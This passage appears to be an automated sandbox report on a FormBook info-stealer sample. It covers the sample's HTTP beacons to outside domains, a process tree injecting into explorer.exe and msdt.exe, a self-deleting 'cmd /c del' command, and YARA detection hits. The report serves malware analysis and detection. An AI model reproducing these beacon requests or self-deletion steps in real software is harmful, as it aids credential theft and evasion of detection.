                                                                                          TimestampkBytes transferredDirectionData
                                                                                          Jun 10, 2021 19:14:21.535777092 CEST3914OUTGET /p2io/?-Z0xlN=OHUffbgtyxVuJk/N29fk0Sz2RAv4pH8VLsDTaDI27e1IsTBLt6kjVq3G5jK+CrAnEI1b&1bs8=cR-P8LD8 HTTP/1.1
                                                                                          Host: www.brunoecatarina.com
                                                                                          Connection: close
                                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                                          Data Ascii:
                                                                                          Jun 10, 2021 19:14:21.678721905 CEST3916INHTTP/1.1 200 OK
                                                                                          Date: Thu, 10 Jun 2021 17:14:21 GMT
                                                                                          Server: Apache
                                                                                          Set-Cookie: session=vgsqnj9v3anbm72u3kk8bh4oh4; path=/; domain=.brunoecatarina.com; secure; SameSite=None
                                                                                          Vary: Accept-Encoding,User-Agent
                                                                                          Connection: close
                                                                                          Transfer-Encoding: chunked
                                                                                          Content-Type: text/html; charset=utf-8
                                                                                          Data Raw: 37 34 33 38 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 2f 73 69 73 74 65 6d 61 2e 63 61 73 61 72 2e 63 6f 6d 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 3f 76 3d 32 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 50 c3 a1 67 69 6e 61 20 6e c3 a3 6f 20 65 6e 63 6f 6e 74 72 61 64 61 20 7c 20 43 61 73 61 72 2e 63 6f 6d 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 67 6f 6f 67 6c 65 2d 73 69 74 65 2d 76 65 72 69 66 69 63 61 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 47 4d 78 74 6d 44 57 69 41 4f 76 2d 53 75 34 7a 39 2d 73 55 41 79 4a 4a 4e 55 47 74 6c 68 79 56 42 4d 75 42 61 33 43 31 66 71 73 22 20 2f 3e 0a 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 65 6d 62 65 64 2e 74 79 70 65 66 6f 72 6d 2e 63 6f 6d 2f 65 6d 62 65 64 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 21 2d 2d 20 48 54 4d 4c 35 20 53 68 69 6d 20 61 6e 64 20 52 65 73 70 6f 6e 64 2e 6a 73 20 49 45 38 20 73 75 70 70 6f 72 74 20 6f 66 20 48 54 4d 4c 35 20 65 6c 65 6d 65 6e 74 73 20 61 6e 64 20 6d 65 64 69 61 20 71 75 65 72 69 65 73 20 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 39 5d 3e 0a 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 6f 73 73 2e 6d 61 78 63 64 6e 2e 63 6f 6d 2f 6c 69 62 73 2f 68 74 6d 6c 35 73 68 69 76 2f 33 2e 37 2e 30 2f 68 74 6d 6c 35 73 68 69 76 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 6f 73 73 2e 6d 61 78 63 64 6e 2e 63 6f 6d 2f 6c 69 62 73 2f 72 65 73 70 6f 6e 64 2e 6a 73 2f 31 2e 33 2e 30 2f 72 65 73 70 6f 6e 64 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 0a 3c 21 2d 2d 20 6f 70 65 6e 20 67 72 61 70 68 20 2d 2d 3e 0a 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 73 69 74 65 5f 6e 61 6d 65 22 20 63 6f 6e 74 65 6e 74 3d 22 43 61 73 61 72 2e 63 6f 6d 22 2f 3e 0a 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 77 65 62 73 69 74 65 22 3e 0a 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 66 62 3a 61 70 70 5f 69 64 22 20 63 6f 6e 74 65 6e 74 3d 22 36 32 31 33 35 32 38 33 37 39 35 37 37 33 36 22 2f 3e 0a 3c 21 2d 2d 20 65 6e 64 20 6f 70 65 6e 20 67 72 61 70 68 20 2d 2d 3e 0a 0a 0a 20 20 20 20 20 20 3c 21 2d 2d 20 67 6f 6f 67 6c 65 20 61 6e 61 6c 79 74 69 63 73 20 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 0a 20 20 28 66 75 6e 63 74 69 6f 6e 28 69 2c 73 2c 6f 2c 67 2c 72 2c 61 2c 6d 29 7b 69 5b 27 47 6f 6f 67 6c 65 41 6e 61 6c 79 74
                                                                                          Data Ascii: 7438<!DOCTYPE html><html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <link rel="shortcut icon" href="//sistema.casar.com/favicon.ico?v=2" /><title>Pgina no encontrada | Casar.com</title><meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta name="google-site-verification" content="GMxtmDWiAOv-Su4z9-sUAyJJNUGtlhyVBMuBa3C1fqs" /><script src="https://embed.typeform.com/embed.js"></script>... HTML5 Shim and Respond.js IE8 support of HTML5 elements and media queries -->...[if lt IE 9]> <script src="https://oss.maxcdn.com/libs/html5shiv/3.7.0/html5shiv.js"></script> <script src="https://oss.maxcdn.com/libs/respond.js/1.3.0/respond.min.js"></script><![endif]-->... open graph --> <meta property="og:site_name" content="Casar.com"/> <meta property="og:type" content="website"> <meta property="fb:app_id" content="621352837957736"/>... end open graph --> ... google analytics --><script> (function(i,s,o,g,r,a,m){i['GoogleAnalyt
                                                                                          Jun 10, 2021 19:14:21.678759098 CEST3917INData Raw: 69 63 73 4f 62 6a 65 63 74 27 5d 3d 72 3b 69 5b 72 5d 3d 69 5b 72 5d 7c 7c 66 75 6e 63 74 69 6f 6e 28 29 7b 0a 20 20 28 69 5b 72 5d 2e 71 3d 69 5b 72 5d 2e 71 7c 7c 5b 5d 29 2e 70 75 73 68 28 61 72 67 75 6d 65 6e 74 73 29 7d 2c 69 5b 72 5d 2e 6c
                                                                                          Data Ascii: icsObject']=r;i[r]=i[r]||function(){ (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o), m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m) })(window,document,'script','//www.google
                                                                                          Jun 10, 2021 19:14:21.678775072 CEST3918INData Raw: 68 61 73 65 27 2c 20 27 4c 65 61 64 27 2c 20 27 43 6f 6d 70 6c 65 74 65 52 65 67 69 73 74 72 61 74 69 6f 6e 27 5d 3b 0a 20 20 20 20 76 61 72 20 74 72 61 63 6b 54 79 70 65 20 3d 20 28 73 74 64 54 72 61 63 6b 73 2e 69 6e 64 65 78 4f 66 28 65 76 74
                                                                                          Data Ascii: hase', 'Lead', 'CompleteRegistration']; var trackType = (stdTracks.indexOf(evtName) > -1) ? 'track' : 'trackCustom'; if (evtParams) { fbq(trackType, evtName, evtParams); } else { fbq(trackType, evtName); } }}
                                                                                          Jun 10, 2021 19:14:21.678787947 CEST3920INData Raw: 79 4e 76 31 73 63 6e 33 74 73 33 4e 59 6f 6e 4a 57 34 4c 38 37 50 4c 36 36 5a 2f 32 38 4e 58 37 35 6f 72 2f 34 46 72 38 35 58 2f 32 39 4f 6e 33 38 2b 50 64 66 61 44 2f 38 4b 76 35 75 74 44 39 38 66 58 7a 78 74 62 30 71 73 58 33 38 74 6a 2f 36 59
                                                                                          Data Ascii: yNv1scn3ts3NYonJW4L87PL66Z/28NX75or/4Fr85X/29On38+PdfaD/8Kv5utD98fXzxtb0qsX38tj/6Yn+/f7/7Z/46/D566z378/18+j++Pv/5nTs0tv655D47LP78cH5wdTkjazXfp7/4l7/4mP1qMP88LvHVoDMXof1v9LYcpfSaY/38+XurcT28+jtor3yzqjdnbXpusvz3eX37sXZf3f75of/7qP50uDrnbnrrGPz2eL
                                                                                          Jun 10, 2021 19:14:21.678805113 CEST3921INData Raw: 20 20 0a 20 20 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 61 76 62 61 72 2d 64 65 66 61 75 6c 74 22 20 69 64 3d 22 6d 6f 62 69 6c 65 2d 6d 65 6e 75 2d 70 72 69 6e 63 69 70 61 6c 22 3e 0a 20 20 20 20 20 20 3c 61 20 63 6c 61 73 73 3d 22 70 75 6c 6c
                                                                                          Data Ascii: <div class="navbar-default" id="mobile-menu-principal"> <a class="pull-left logo" href="//www.casar.com"> <img src="//sistema.casar.com/img/layout/rebranding/logo-casarpontocom-anel-70.png" alt="Logo Casar Site
                                                                                          Jun 10, 2021 19:14:21.678822041 CEST3922INData Raw: 2d 77 69 64 74 68 3a 20 31 33 34 70 78 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 69 6d 67 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6c 61 73 73 3d 22 73 65 63 6f 6e 64 5f 6c 6f
                                                                                          Data Ascii: -width: 134px" /> <img class="second_logo" src="//sistema.casar.com/img/layout/rebranding/logo-casarpontocom-anel-70.png" alt="Logo Casar Site de casament
                                                                                          Jun 10, 2021 19:14:21.678838015 CEST3924INData Raw: 73 73 3d 22 61 74 69 76 6f 22 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 61 73 61 72 2e 63 6f 6d 22 20 63 6c 61 73 73 3d 22 64 65 73 74 61 71 75 65 22 3e 48 6f 6d 65 3c 2f 61 3e 3c 2f 6c 69 3e 0a 20 20 20 20 20 20 20 20
                                                                                          Data Ascii: ss="ativo"><a href="https://www.casar.com" class="destaque">Home</a></li> <li><a href="https://www.casar.com/assunto/casamentos/casamentos-reais/">Casamentos Reais</a></li> <li><a href="h
                                                                                          Jun 10, 2021 19:14:21.678853989 CEST3925INData Raw: 20 20 20 20 20 20 3c 6c 69 20 63 6c 61 73 73 3d 22 20 20 64 72 6f 70 64 6f 77 6e 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                          Data Ascii: <li class=" dropdown"> <a href="#" class="dropdown-toggle" data-toggle="dropdown" onclick="trackEvt('home', 'menu', 'eventos'); return true;">
                                                                                          Jun 10, 2021 19:14:21.678869963 CEST3927INData Raw: 74 6f 67 67 6c 65 22 20 64 61 74 61 2d 74 6f 67 67 6c 65 3d 22 64 72 6f 70 64 6f 77 6e 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6f 6e 63 6c 69 63 6b 3d 22 74 72 61 63 6b 45 76 74 28 27 68 6f 6d 65 27
                                                                                          Data Ascii: toggle" data-toggle="dropdown" onclick="trackEvt('home', 'menu', 'facasitegratis'); return true;"> Site de Casamento <b class="caret"></b> </a> <
                                                                                          Jun 10, 2021 19:14:21.678889990 CEST3928INData Raw: 6f 73 2e 63 61 73 61 72 2e 63 6f 6d 2f 62 75 73 63 61 22 20 20 6f 6e 63 6c 69 63 6b 3d 22 74 72 61 63 6b 45 76 74 28 27 73 69 74 65 2d 64 6f 73 2d 6e 6f 69 76 6f 73 2d 6d 65 6e 75 27 2c 20 27 62 75 73 63 61 64 6f 72 2d 6c 69 73 74 61 27 2c 20 27
                                                                                          Data Ascii: os.casar.com/busca" onclick="trackEvt('site-dos-noivos-menu', 'buscador-lista', 'compre-seu-presente'); return true;">Encontre um casamento</a></li> </ul> </li> </ul>
                                                                                          Jun 10, 2021 19:14:21.813819885 CEST3929INData Raw: 61 69 6e 65 72 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 31 3e 50 c3 a1 67 69 6e 61 20 6e c3 a3 6f 20 65 6e 63 6f 6e 74 72 61 64 61 3c 2f 68 31 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 62 72 3e 0a 3c 64
                                                                                          Data Ascii: ainer"> <h1>Pgina no encontrada</h1> <br><div class="alert alert-danger">Verifique o endereo (URL) e tente novamente</div> </div> </div> <link href="//fonts.googleapis.com/css?family=S


                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                          8192.168.2.34975223.82.57.3280C:\Windows\explorer.exe
                                                                                          TimestampkBytes transferredDirectionData
                                                                                          Jun 10, 2021 19:14:27.322182894 CEST3946OUTGET /p2io/?1bs8=cR-P8LD8&-Z0xlN=WkKybY+EW+ZFcjRL6hKPcEEM/Z4gp4PnllRo5afgEdT4hrEaW59DTbMK1uLBueD84dbw HTTP/1.1
                                                                                          Host: www.ruhexuangou.com
                                                                                          Connection: close
                                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                                          Data Ascii:
                                                                                          Jun 10, 2021 19:14:29.504343033 CEST3947INHTTP/1.1 200 OK
                                                                                          Server: Tengine
                                                                                          Date: Thu, 10 Jun 2021 17:14:27 GMT
                                                                                          Content-Type: text/html;charset=utf-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: close
                                                                                          Vary: Accept-Encoding
                                                                                          Data Raw: 33 34 31 0d 0a 0a 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 0a 3c 73 63 72 69 70 74 3e 0a 76 61 72 20 5f 68 6d 74 20 3d 20 5f 68 6d 74 20 7c 7c 20 5b 5d 3b 0a 28 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0a 20 20 76 61 72 20 68 6d 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 0a 20 20 68 6d 2e 73 72 63 20 3d 20 22 68 74 74 70 73 3a 2f 2f 68 6d 2e 62 61 69 64 75 2e 63 6f 6d 2f 68 6d 2e 6a 73 3f 64 63 34 64 64 62 66 32 62 33 66 65 65 66 64 61 35 35 37 35 30 61 66 34 34 30 35 35 30 32 31 62 22 3b 0a 20 20 76 61 72 20 73 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 22 73 63 72 69 70 74 22 29 5b 30 5d 3b 20 0a 20 20 73 2e 70 61 72 65 6e 74 4e 6f 64 65 2e 69 6e 73 65 72 74 42 65 66 6f 72 65 28 68 6d 2c 20 73 29 3b 0a 7d 29 28 29 3b 0a 3c 2f 73 63 72 69 70 74 3e 0a 0a 0a 3c 74 69 74 6c 65 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0a 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 341<html><head><script>var _hmt = _hmt || [];(function() { var hm = document.createElement("script"); hm.src = "https://hm.baidu.com/hm.js?dc4ddbf2b3feefda55750af44055021b"; var s = document.getElementsByTagName("script")[0]; s.parentNode.insertBefore(hm, s);})();</script><title>502 Bad Gateway</title></head><body bgcolor="white"><center><h1>502 Bad Gateway</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->0


                                                                                          Code Manipulations

                                                                                          Statistics

                                                                                          CPU Usage

                                                                                          Click to jump to process

                                                                                          Memory Usage

                                                                                          Click to jump to process

                                                                                          High Level Behavior Distribution

                                                                                          Click to dive into process behavior distribution

                                                                                          Behavior

                                                                                          Click to jump to process

                                                                                          System Behavior

                                                                                          Analysis Process: DNPr7t0GMY.exe PID: 6428 Parent PID: 5748

                                                                                          General

                                                                                          Start time:19:12:24
                                                                                          Start date:10/06/2021
                                                                                          Path:C:\Users\user\Desktop\DNPr7t0GMY.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:'C:\Users\user\Desktop\DNPr7t0GMY.exe'
                                                                                          Imagebase:0xf10000
                                                                                          File size:1325568 bytes
                                                                                          MD5 hash:F41951980D050C8FE13C8A2E31E55B94
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:.Net C# or VB.NET
                                                                                          Yara matches:
                                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.220966733.00000000042E9000.00000004.00000001.sdmp, Author: Joe Security
                                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.220966733.00000000042E9000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.220966733.00000000042E9000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                          • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000002.00000002.220290008.0000000003320000.00000004.00000001.sdmp, Author: Joe Security
                                                                                          Reputation:low

                                                                                          Chronological Activities

                                                                                          Analysis Process: DNPr7t0GMY.exe PID: 6588 Parent PID: 6428

                                                                                          General

                                                                                          Start time:19:12:28
                                                                                          Start date:10/06/2021
                                                                                          Path:C:\Users\user\Desktop\DNPr7t0GMY.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:C:\Users\user\Desktop\DNPr7t0GMY.exe
                                                                                          Imagebase:0x4f0000
                                                                                          File size:1325568 bytes
                                                                                          MD5 hash:F41951980D050C8FE13C8A2E31E55B94
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Yara matches:
                                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000000.216484865.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000000.216484865.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000000.216484865.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.271117141.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.271117141.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.271117141.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.271551704.0000000000CF0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.271551704.0000000000CF0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.271551704.0000000000CF0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.271485121.0000000000CC0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.271485121.0000000000CC0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.271485121.0000000000CC0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                          Reputation:low

                                                                                          Chronological Activities

                                                                                          Analysis Process: explorer.exe PID: 3388 Parent PID: 6588

                                                                                          General

                                                                                          Start time:19:12:31
                                                                                          Start date:10/06/2021
                                                                                          Path:C:\Windows\explorer.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:
                                                                                          Imagebase:0x7ff714890000
                                                                                          File size:3933184 bytes
                                                                                          MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:high

                                                                                          Chronological Activities

                                                                                          Analysis Process: msdt.exe PID: 5876 Parent PID: 3388

                                                                                          General

                                                                                          Start time:19:12:51
                                                                                          Start date:10/06/2021
                                                                                          Path:C:\Windows\SysWOW64\msdt.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:C:\Windows\SysWOW64\msdt.exe
                                                                                          Imagebase:0x11e0000
                                                                                          File size:1508352 bytes
                                                                                          MD5 hash:7F0C51DBA69B9DE5DDF6AA04CE3A69F4
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Yara matches:
                                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000002.478198621.0000000000C50000.00000004.00000001.sdmp, Author: Joe Security
                                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000002.478198621.0000000000C50000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000002.478198621.0000000000C50000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000002.478065429.0000000000C20000.00000040.00000001.sdmp, Author: Joe Security
                                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000002.478065429.0000000000C20000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000002.478065429.0000000000C20000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000002.477312798.0000000000780000.00000040.00000001.sdmp, Author: Joe Security
                                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000002.477312798.0000000000780000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000002.477312798.0000000000780000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                          Reputation:moderate

                                                                                          Chronological Activities

                                                                                          Analysis Process: cmd.exe PID: 4768 Parent PID: 5876

                                                                                          General

                                                                                          Start time:19:12:55
                                                                                          Start date:10/06/2021
                                                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:/c del 'C:\Users\user\Desktop\DNPr7t0GMY.exe'
                                                                                          Imagebase:0xb40000
                                                                                          File size:232960 bytes
                                                                                          MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:high

                                                                                          Chronological Activities

                                                                                          Analysis Process: conhost.exe PID: 6244 Parent PID: 4768

                                                                                          General

                                                                                          Start time:19:12:56
                                                                                          Start date:10/06/2021
                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                          Imagebase:0x7ff6b2800000
                                                                                          File size:625664 bytes
                                                                                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:high

                                                                                          Chronological Activities

                                                                                          Disassembly

                                                                                          Code Analysis

                                                                                          Reset < >

                                                                                            Analysis Process: DNPr7t0GMY.exe PID: 6428 Parent PID: 5748 DNPr7t0GMY.exeCOMMON

                                                                                            Executed Functions

                                                                                            Function 03136B80, Relevance: 6.1, APIs: 4, Instructions: 124threadCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetCurrentProcess.KERNEL32 ref: 03136BF0
                                                                                            • GetCurrentThread.KERNEL32 ref: 03136C2D
                                                                                            • GetCurrentProcess.KERNEL32 ref: 03136C6A
                                                                                            • GetCurrentThreadId.KERNEL32 ref: 03136CC3
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.220173246.0000000003130000.00000040.00000001.sdmp, Offset: 03130000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: Current$ProcessThread
                                                                                            • String ID:
                                                                                            • API String ID: 2063062207-0
                                                                                            • Opcode ID: 09f3123a6ca88ec16d8ecb507f4b834cecaaefd2c945b3942f99834862e597cf
                                                                                            • Instruction ID: 7b1b7426471f40cda490846711000a795762a3d1f113df99873ad4410b5e2e28
                                                                                            • Opcode Fuzzy Hash: 09f3123a6ca88ec16d8ecb507f4b834cecaaefd2c945b3942f99834862e597cf
                                                                                            • Instruction Fuzzy Hash: F85153B09002499FDB14DFAADA88B9EBBF0EF8D314F248059E419B7251DB349884CF65
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 03136B90, Relevance: 6.1, APIs: 4, Instructions: 120threadCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetCurrentProcess.KERNEL32 ref: 03136BF0
                                                                                            • GetCurrentThread.KERNEL32 ref: 03136C2D
                                                                                            • GetCurrentProcess.KERNEL32 ref: 03136C6A
                                                                                            • GetCurrentThreadId.KERNEL32 ref: 03136CC3
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.220173246.0000000003130000.00000040.00000001.sdmp, Offset: 03130000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: Current$ProcessThread
                                                                                            • String ID:
